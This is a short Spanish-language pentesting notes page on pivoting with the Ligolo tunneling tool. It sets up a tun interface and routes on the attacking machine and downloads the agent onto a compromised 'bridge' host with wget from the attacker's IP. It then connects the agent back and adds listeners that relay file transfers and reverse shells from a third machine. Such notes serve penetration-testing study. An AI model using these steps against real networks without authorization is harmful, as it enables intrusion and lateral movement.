Blog Desarrollo Personal Twitter Instagram

🐇Ligolo

Conejo italiano

-------- gracias a @xerosec por la explicación de esta herramienta uwu -------

Preparativos

  • Crear interfaz de red modo tunnel

sudo ip tuntap add user $USER mode tun ligolo

# levantamos la interfaz
sudo ip link set ligolo up

  • Añadir route hacia el segmento de red objetivo a través del dispositivo de red ligolo

sudo ip route add <segmento/x> dev ligolo

Pivoting

  • Activar el proxy en máquina atacante

chmod +x proxy
./proxy -selfcert

  • Transferir agent a la máquina puente

cd /tmp
wget http://<IPa>/agent # transferimos agent
chmod +x agent

  • Conectar máquina puente a máquina atacante

./agent -connect <IPa>:<ligolo-port> -ignore-cert

  • Establecer tunnel desde máquina atacante

session
# seleccionar número sesión en caso de existir varias
start

ping <IP> # comprobamos alcance a tercera máquina

Port Forwarding

Pese a que nosotros tenemos alcance con la tercera máquina mediante este tunnel, la tercera máquina no puede alcanzar nuestra máquina atacante. Esto nos limitaría a la hora de transferir archivos y recibir conexiones (reverse shells)

  • Añadir listener para redirigir flujo de puertos

listener_add --addr  --to 127.0.0.1:80
listerner_list

  • Ya podríamos usar el puerto de la máquina puente para transferir archivos a nuestra máquina atacante desde la tercera máquina.

AnteriorPivotingSiguienteScripting

Última actualización